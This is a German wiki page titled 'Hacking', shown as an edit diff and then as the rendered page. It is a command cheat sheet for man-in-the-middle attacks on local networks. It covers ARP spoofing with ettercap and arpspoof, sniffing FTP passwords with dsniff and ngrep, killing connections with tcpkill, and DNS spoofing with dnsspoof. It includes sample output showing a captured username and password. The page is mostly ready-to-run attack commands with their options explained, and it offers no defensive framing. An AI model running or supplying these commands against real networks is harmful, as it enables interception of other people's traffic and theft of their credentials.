Hacking: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(Die Seite wurde neu angelegt: „=ettercap= http://www.tech-juice.org/2011/06/20/man-in-the-middle-attacks-with-ettercap/“) |
Jan (Diskussion | Beiträge) |
||
| Zeile 1: | Zeile 1: | ||
=ettercap= | =ettercap= | ||
http://www.tech-juice.org/2011/06/20/man-in-the-middle-attacks-with-ettercap/ | http://www.tech-juice.org/2011/06/20/man-in-the-middle-attacks-with-ettercap/ | ||
| + | |||
| + | =dsniff= | ||
| + | == Ettercap == | ||
| + | '''Installation unter Ubuntu oder Debian''' | ||
| + | apt-get install ettercap | ||
| + | '''Arpspoofig mit Ettercap''' | ||
| + | ettercap -T -q -M ARP /192.168.254.7/ // | ||
| + | |||
| + | '''optionen''' | ||
| + | -T = Textmodus | ||
| + | -q = still | ||
| + | -M ARP = ARP Spoofing | ||
| + | /192.168.254.7/ = Der "infizierte" Host | ||
| + | // = kompletes Netz wird gefaked | ||
| + | |||
| + | == Dsniff Tools == | ||
| + | '''Installation unter Ubuntu oder Debian''' | ||
| + | apt-get install dsniff | ||
| + | '''Passwörter spionieren mit dsniff - Beispiele''' | ||
| + | ==Dsniff== | ||
| + | '''sniffen''' | ||
| + | dsniff -n -i eth1 -s 1500 host 85.10.194.199 -w geheim.dat | ||
| + | |||
| + | '''auswerten''' | ||
| + | dsniff -r geheim.dat | ||
| + | ----------------- | ||
| + | 02/06/07 18:51:34 tcp sagittarion.alpha.quadrant.46200 -> neelix.talaxia.de.21 (ftp) | ||
| + | USER wuschel | ||
| + | PASS suxa | ||
| + | |||
| + | '''optionen''' | ||
| + | -n = numerische Ausgabe | ||
| + | -i eth1 = Schnittstelle | ||
| + | -s 1500 = Länge des Mitschnittes pro Paket | ||
| + | -w geheim.dat = schreibe in die Datei | ||
| + | host 85.10.194.199 = Muster wie bei tcpdump | ||
| + | -r geheim.dat = lese aus der Datei | ||
| + | |||
| + | ==Tcpkill== | ||
| + | tcpkill port 80 | ||
| + | |||
| + | '''optionen''' | ||
| + | port 80 = Muster wie bei tcpdump | ||
| + | |||
| + | ==Arpspoof== | ||
| + | arpspoof -t 192.168.254.7 192.168.254.5 | ||
| + | |||
| + | '''optionen''' | ||
| + | -t 192.168.254.7 = Angriffszeil | ||
| + | 192.168.254.5 = Mac Adresse wird mit lokaler MacAdresse vertauscht | ||
| + | |||
| + | ==Webspy== | ||
| + | mozilla& | ||
| + | webspy 192.168.254.22 | ||
| + | |||
| + | ==Dnsspoof== | ||
| + | '''Der Nameserver muss umgeleitet werden''' | ||
| + | ettercap -T -q -M ARP /192.168.254.22/ /192.168.254.4/ | ||
| + | |||
| + | '''hosts anlegen''' | ||
| + | 192.168.254.4 www.xinux.de | ||
| + | |||
| + | '''dnsspoofen''' | ||
| + | dnsspoof -f hosts | ||
| + | |||
| + | == Ngrep == | ||
| + | '''Installation unter Ubuntu oder Debian''' | ||
| + | apt-get install ngrep | ||
| + | '''Passwörter spionieren mit ngrep - Beispiele''' | ||
| + | '''sniffen''' | ||
| + | ngrep -d eth1 -s 1500 -l -i 'PASS|USER' port 21 | ||
| + | |||
| + | '''optionen''' | ||
| + | -d eth1 = Schnittstelle | ||
| + | -s 1500 = Länge des Mitschnittes pro Paket | ||
| + | -l = Ausgabe wird zeilenweise gepuffert | ||
| + | -i = Ignoriere Gross und Kleinschreibung | ||
| + | 'PASS|USER' = Suchmuster in den Daten PASS oder USER | ||
| + | port 21 = Muster wie bei tcpdump | ||
Version vom 6. August 2014, 07:14 Uhr
ettercap
http://www.tech-juice.org/2011/06/20/man-in-the-middle-attacks-with-ettercap/
dsniff
Ettercap
Installation unter Ubuntu oder Debian
apt-get install ettercap Arpspoofig mit Ettercap ettercap -T -q -M ARP /192.168.254.7/ // optionen -T = Textmodus -q = still -M ARP = ARP Spoofing /192.168.254.7/ = Der "infizierte" Host // = kompletes Netz wird gefaked
Dsniff Tools
Installation unter Ubuntu oder Debian
apt-get install dsniff
Passwörter spionieren mit dsniff - Beispiele
Dsniff
sniffen dsniff -n -i eth1 -s 1500 host 85.10.194.199 -w geheim.dat auswerten dsniff -r geheim.dat ----------------- 02/06/07 18:51:34 tcp sagittarion.alpha.quadrant.46200 -> neelix.talaxia.de.21 (ftp) USER wuschel PASS suxa optionen -n = numerische Ausgabe -i eth1 = Schnittstelle -s 1500 = Länge des Mitschnittes pro Paket -w geheim.dat = schreibe in die Datei host 85.10.194.199 = Muster wie bei tcpdump -r geheim.dat = lese aus der Datei
Tcpkill
tcpkill port 80 optionen port 80 = Muster wie bei tcpdump
Arpspoof
arpspoof -t 192.168.254.7 192.168.254.5 optionen -t 192.168.254.7 = Angriffszeil 192.168.254.5 = Mac Adresse wird mit lokaler MacAdresse vertauscht
Webspy
mozilla& webspy 192.168.254.22
Dnsspoof
Der Nameserver muss umgeleitet werden ettercap -T -q -M ARP /192.168.254.22/ /192.168.254.4/ hosts anlegen 192.168.254.4 www.xinux.de dnsspoofen dnsspoof -f hosts
Ngrep
Installation unter Ubuntu oder Debian
apt-get install ngrep
Passwörter spionieren mit ngrep - Beispiele
sniffen ngrep -d eth1 -s 1500 -l -i 'PASS|USER' port 21
optionen -d eth1 = Schnittstelle -s 1500 = Länge des Mitschnittes pro Paket -l = Ausgabe wird zeilenweise gepuffert -i = Ignoriere Gross und Kleinschreibung 'PASS|USER' = Suchmuster in den Daten PASS oder USER port 21 = Muster wie bei tcpdump